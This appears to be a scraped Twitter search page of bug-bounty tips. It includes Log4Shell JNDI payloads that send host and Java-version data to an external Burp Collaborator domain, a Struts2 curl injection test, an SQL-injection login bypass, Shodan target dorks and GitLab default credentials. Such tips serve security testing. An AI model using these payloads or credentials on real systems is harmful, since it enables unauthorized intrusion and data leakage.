Search results
  1. Dec 12

    Verify Java Version, if not vulnerable don't bother and go to the next target! How? ${jndi:ldap://${env:JAVA_VERSION}.5ou7zt0bj640uqc0bsy1hvyrpiv8jx.burpcollaborator.net}

    10 replies 113 retweets 421 likes
    Show this thread
    Show this thread
  2. 22 hours ago

    trying to test every header of a website for ? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :)

    9 replies 171 retweets 575 likes
  3. 14 hours ago

    log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

    79 retweets 205 likes
  4. Dec 11

    ~Admin Panel Accessed via sqli 1- Search for Login panels through with this dork: org:"TARGET" http.title:"login" 2- Bypass login with old way: admin' or 1=1

    6 replies 120 retweets 366 likes
  5. Dec 11

    Apache Log4j RCE Attack Flow - ExploitWareLabs

    87 retweets 155 likes
  6. 19 hours ago

    I just published a new write-up at Medium! How I found a IDOR issue in 5 mins? Please ask through direct message if you have any question about bugbounty or information security! Have a great day y'all. :)

    6 replies 47 retweets 146 likes
  7. Dec 7

    Grafana v8.2.6 unauthorized read of arbitrary files shodan: shodan search --color 'app="Grafana"' --fields ip_str

    8 replies 268 retweets 574 likes
  8. Dec 9

    ⭐️⭐️⭐️ Cloudflare SQLi Bypass by 'Cyber Guy'

    3 replies 86 retweets 270 likes
  9. Dec 6

    ⭐️⭐️⭐️ Bypass file upload restriction by 'MikeChan' 1. Line Termination Trick 2. Content-Disposition Overflow 3. File Name Overflow 4. Duplicated Line 5. Double Extension Another thing comes to your mind? Comment it :)

    2 replies 101 retweets 249 likes
  10. Dec 4

    If you found a GitLab instance, try to login as root/admin with those credentials:- Username: root & pass: 5iveL!fe Username: admin & Pass: 5iveL!fe You can find it with : org:"Target" http.title:"GitLab"

    8 replies 333 retweets 777 likes
  11. Dec 11

    Don't forget to use the handy Burp Proxy Match and Replace rules for finding , while browsing targets. Pretty simple but effective.

    5 replies 98 retweets 281 likes
    Show this thread
    Show this thread
  12. Dec 5

    Best Tip to Detect XSS with Dalfox The Command:-

    3 replies 86 retweets 219 likes
  13. Dec 7

    crawl hidden parameters from source like <input> tag and js variable and scan with jaeles

    3 replies 22 retweets 64 likes
    Show this thread
    Show this thread
  14. 2 hours ago

    solo vengo a confirmarles que el se paga solo // I just come to confirm that the pays for itself

    2 retweets 9 likes
  15. Dec 7

    Here's a little thing I picked up today. If you have a list of urls and want to throw them into burp and get the responses, try this. cat urls.txt | fff -S -o resp --proxy <proxy> -H "Cookie: <yourcookies>" I took this from Arjun -> Burp, very fast!

    7 replies 39 retweets 133 likes
    Show this thread
    Show this thread
  16. Dec 12

    People getting paid 4 digit bounties for log4j RCE and here I am who didn't even started looking for it. Is this normal or am I missing huge payouts?

    3 replies 3 retweets 4 likes
  17. Dec 12

    If you have a Struts2 target, you can try to find if its vulnerable to curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js 1/n

    1 reply 5 retweets 7 likes
    Show this thread
    Show this thread

No results.

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.